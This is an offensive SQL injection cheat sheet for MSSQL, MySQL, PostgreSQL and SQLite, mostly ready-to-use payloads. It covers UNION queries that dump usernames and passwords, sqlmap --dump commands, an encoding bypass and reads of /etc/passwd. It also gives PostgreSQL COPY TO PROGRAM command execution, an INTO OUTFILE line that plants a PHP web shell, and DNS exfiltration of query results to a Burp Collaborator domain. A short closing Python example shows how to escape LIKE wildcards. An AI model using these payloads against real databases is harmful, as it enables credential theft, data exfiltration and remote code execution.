SQL Injection

Database enumeration

MSSQL

Test

' or 1=1-- -

Identify number of columns

Increase the column number from 1 until an error or different content is returned:

' order by 1-- -
' order by 7-- -

Confirm number of columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -

Get columns from table Users

' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

MySQL

SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

PostgreSQL

SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

SQLite

SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3

Post request

sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3

Bypass

Encoding payload using utf-16

user_input = input().strip()
# rewrite each character of the input as a \u00XX escape sequence
utf = [f"\\u00{ord(i):02x}" for i in user_input]
print(''.join(utf))

Error based

PostgreSQL

' AND 1=CAST((SELECT username FROM users) AS int)--

File read/write & RCE

PostgreSQL

SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';

MySQL

SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Faster Exfiltration via DNS

  • https://github.com/PortSwigger/sqlmap-dns-collaborator
  • https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf

SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.

How you would normally perform DNS exfiltration with Sqlmap:

  1. You buy a domain name, a public IP and then you set up a server
  2. You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to your DNS server containing interesting data.
  4. DNS requests are interpreted by Sqlmap.

How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:

  1. You open Burp on your computer and enable SqlmapDnsCollaborator.
  2. You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
  4. SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
  5. DNS requests are interpreted by Sqlmap.

sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-supplied parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

Each "_" is a wildcard that matches one character of the secret.
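The lookup above beside a hardened version, as an added example in Python with the standard sqlite3 module (not code from this page): the table, the token and the probe are constructed sample data, and escape_like and lookup_safe are names chosen here. The point is that binding the parameter stops classic injection but not wildcard injection; escaping % and _ with an explicit ESCAPE clause does.

```python
import sqlite3

# Constructed sample data (not from the page): one password-reset token.
SAMPLE_SECRET = "a9f3c1d27b"


def make_db() -> sqlite3.Connection:
    """In-memory table shaped like the page's query: columns text and secrets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resets (text TEXT, secrets TEXT)")
    conn.execute("INSERT INTO resets VALUES (?, ?)", ("reset-link-for-alice", SAMPLE_SECRET))
    return conn


def lookup_unsafe(conn: sqlite3.Connection, secret: str):
    """The vulnerable pattern: the value is bound (so no classic injection),
    but '%' and '_' inside it are still interpreted by LIKE as wildcards."""
    row = conn.execute("SELECT text FROM resets WHERE secrets LIKE ?", (secret,)).fetchone()
    return row[0] if row else None


def escape_like(value: str, esc: str = "\\") -> str:
    """Escape LIKE metacharacters so the input matches literally.
    The escape character itself is doubled first."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_safe(conn: sqlite3.Connection, secret: str):
    """Hardened form: escaped input plus an explicit ESCAPE clause.
    (For an exact token check, '= ?' is simpler and needs no escaping at all.)"""
    row = conn.execute(
        "SELECT text FROM resets WHERE secrets LIKE ? ESCAPE '\\'",
        (escape_like(secret),),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """The page's probe: two guessed characters followed by one '_' per remaining character."""
    conn = make_db()
    probe = "a9" + "_" * (len(SAMPLE_SECRET) - 2)
    return {
        "unsafe_probe_matches": lookup_unsafe(conn, probe) is not None,
        "safe_probe_matches": lookup_safe(conn, probe) is not None,
        "safe_exact_matches": lookup_safe(conn, SAMPLE_SECRET) is not None,
    }
```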

Sources